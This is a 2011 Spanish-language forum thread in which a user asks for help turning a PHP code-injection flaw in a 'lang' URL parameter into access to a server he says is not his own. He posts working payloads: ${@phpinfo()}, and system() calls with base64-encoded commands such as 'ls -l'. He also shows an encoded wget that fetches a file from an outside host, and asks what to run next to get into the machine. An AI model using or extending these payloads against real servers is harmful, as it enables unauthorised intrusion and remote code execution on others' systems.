Título: PHP injection Publicado por: chusrubi2 en 10 Junio 2011, 01:41 am Buenas.
Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación: 1.-http://localhost/?lang=${@phpinfo()} FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo). 2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio). Así que pensé en utilizar base64. 3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir. Thanks. ;D Título: Re: PHP injection Publicado por: chusrubi2 en 10 Junio 2011, 16:06 pm Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686 Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc). ¿Qué comandos, y de qué manera debería ponerlos en la url para acceder? Gracias. Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64. Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64)) XXXCODEENBASE64=wget xxx.com/phpinfo.txt Pero no funciona, se tira todo el rato cargando y no hace nada... Título: Re: PHP injection Publicado por: Shell Root en 10 Junio 2011, 18:38 pm Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
Título: Re: PHP injection Publicado por: chusrubi2 en 10 Junio 2011, 19:51 pm Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga... ¿Qué otra cosa puedo hacer? |